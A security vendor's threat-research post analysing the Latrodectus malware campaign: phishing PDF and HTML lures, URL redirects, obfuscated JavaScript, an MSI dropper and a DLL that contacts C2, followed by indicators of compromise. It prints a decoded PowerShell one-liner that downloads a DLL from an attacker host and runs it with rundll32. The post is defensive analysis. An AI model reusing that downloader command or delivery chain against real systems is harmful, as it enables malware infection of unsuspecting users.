Ana içeriğe git
|
0 dakika okuma

Inside the Latrodectus Malware Campaign

Old school phishing meets innovative payload delivery

Get a Demo of Forcepoint Solutions

This report offers an in-depth analysis of recent Latrodectus campaign activity uncovered by our X-Labs research team.  One of the principal dissemination techniques for Latrodectus involves phishing emails, leveraging infrastructure like that of IcedID. 

Latrodectus primarily targets financial, automotive and healthcare business sectors.  By compromising email accounts and distributing malicious attachments, it propagates across a broader network of potential targets. 

Currently, threat actors are increasingly adopting Latrodectus, utilizing prevalent attachment formats such as HTML and PDF. It is typically engineered for stealth and persistence, complicating detection and eradication efforts. This can lead to the exfiltration of personal data, financial losses due to fraud or extortion, and the compromise of sensitive information.

The Latrodectus campaign initiates with attacks originating from a compromised email that appears to contain critical DocuSign documents. Users are encouraged to access the document via the provided link. When the link is clicked, users are redirected to a malicious URL, resulting in the inadvertent download of the next-stage payload.

Fig. 1 - Attack chain

Fig. 2 - Initial access PDF

Fig. 3 - PDF suspicious embedded URL

PDF contains compromised domain with redirection:
“hxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW”

 It redirects to shortner URLs to another suspicious domain:

 “hxxps://digitalpinnaclepub[.]com/?3” and finally redirects to “storage.googleapis.com” project to download malicious obfuscated JavaScricpt “hxxps://storage[.]googleapis[.]com/braided-turbine-435813-n7[.]appspot[.]com/VA8PBxartt/Document-20-17-57.js”

Obfuscated JavaScript Analysis:

  • JavaScript contains a lot of junk messages in “//” which increases obfuscation and file size. Actual malicious JavaScript code is commented in “////”

Fig. 4 - Obfuscated JavaScript payload

  • After removing junk messages, it shows obfuscated JavaScript string manipulation replace and join functions. Replacing “////” with a space (“ “) shows actual malcode.

Fig. 5 - Deobfuscated Javascript string manipulation functions

  • After deobfuscation, it creates ActiveXObject("WindowsInstaller.Installer") and downloads a .msi installer file. See Fig. 6 below:

 Fig. 6  - Deobfuscated Javascript code downloads MSI file

 

MSI Analysis:

  • MSI file is executed via JavaScript and drops malicious 64-bit .dll file in %appdata%. It also executes .dll with rundll32.exe using export function parameters.

Fig. 7 - MSI file

  • Dropped .dll contains export function “GetDeepDVCState” and MSIexecute this .dll with parameter “/DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\Admin\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState”

 

DLL Analysis:

  • DLL is a Microsoft Visual C++ 64-bit binary with fake NVIDIA version information:

Fig. 8  - DLL vesion info

  • Upon analysis, this DLL unpacks another stage DLL payload in memory:

 Fig. 9 - DLL verion info.

Unpacked 64-bit dll binary connects to malicious C2 server on unusual port 8041.

Greshunka[.]com:8041/bazar.php


Initial Access via HTML

Phishing HTML page which looks like a Word document pop-up to the user. Clicking on the button executes malicious JavaScript code embedded in HTML. See Fig. 10 below:

Fig. 10  - HTML attachment

It contains pop-up warning messages in reverse order:

“document.getElementById("prompt").innerHTML = ll('.nottub >b/<"noituloS">b< eht gnisu woleb snoitcurtsni eht wollof esaelP .tnemucod siht fo yalpsid enilffo tcerroc troppus ton seod resworb ruoY');”

Reversed message: 

Your browser does not support correct offline display of this document. Please follow the instructions below using the

It also uses different string encoding window.atob() and obfuscation functions s.split("").reverse().join(""); 

Fig. 11 - Suspicious code in HTML

Decoded base64 code

cmd /c start /min powershell $path='%appdata%\witwin_st_x64.dll';iwr hxxp://gertioma[.]top/o.jpg -outfile $path; start-process rundll32 $path,NxReleasePMap8==

It shows threat actors try to use HTML to launch PowerShell and directly downloads the DLL payload without MSI and executes it with rundll32.exe and connects to C2. We have observed few campaigns with an HTML attachment in compromised emails.


Conclusion:

Threat actors continue to use older emails to target users via suspicious PDF or HTML attachments. They use a redirection method with URL shorteners and host malicious payloads on well-known storage[.]googleapis[.]com hosting projects. Then downloads obfuscated JavaScript to download MSI and uses rundll32.exe to execute 64-bit DLL. 

This campaign mixes the old with the new. Latrodectus leverages older infrastructure, combined with a new, innovative malware payload distribution method to financial, automotive and business sectors.

Protection statement: 

Forcepoint customers are protected against this threat at the following stages of attack:

  • Stage 2 (Lure) – Malicious PDF and HTML attachments associated with these attacks are identified and blocked.
  • Stage 3 (Redirect) – Blocked redirectional shortened URLs and compromised domains
  • Stage 5 (Dropper File) - The dropper files are added to Forcepoint malicious database and are blocked.
  • Stage 6 (Call Home) - Blocked C2 credentials

IOCs

Initial Stage URLs: 

  • hxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW
  • hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW
  • hxxps://digitalpinnaclepub[.]com/?3
  • hxxps://storage[.]googleapis[.]com/braided-turbine-435813-n7[.]appspot[.]com/VA8PBxartt/Document-20-17-57.js
  • hxxp://194[.]54[.]156[.]91/dsa.msi
  • hxxp://gertioma[.]top/o.jpg

C2s:

  • tiguanin[.]com
  • greshunka[.]com
  • bazarunet[.]com
  • mazinom[.]com
  • leroboy[.]com
  • krinzhodom[.]com
  • klemanzino[.]net
  • rilomenifis[.]com
  • isomicrotich[.]com

 

Hashes:

  • 35A990C3BE798108C9D12A47F4A028468EA6095B
  • 9361621490915EBB919B79C6101874F03E4E51BC
  • 71E99A21FFA29E1E391811F5A3D04DCBB9CF0949
  • 570c4ab78cf4bb22b78aac215a4a79189d4fa9ed
  • 62e23500cc5368e37be47371342784f72e481647
  • 881993bcb37aa9504249271b7559addc0c633f09
  • 7474873629399ee5fdd984c99b705e0490ab8707

 

  • mayur-sewani.jpg

    Mayur Sewani

    Mayur serves as a Senior Security Researcher as part of the Forcepoint X-Labs Research Team. He focuses on APT malwares, information stealers, phishing attacks, and also works to stay on top of the latest threats. He is passionate about advancing the field of defensive adversary emulation and research.

    Daha fazla makale oku Mayur Sewani

    Makalede

    X-Labs

    Get insight, analysis & news straight to your inbox

    Konuya Gel

    Siber Güvenlik

    Siber güvenlik dünyasındaki en son trendleri ve konuları kapsayan bir podcast

    Şimdi Dinle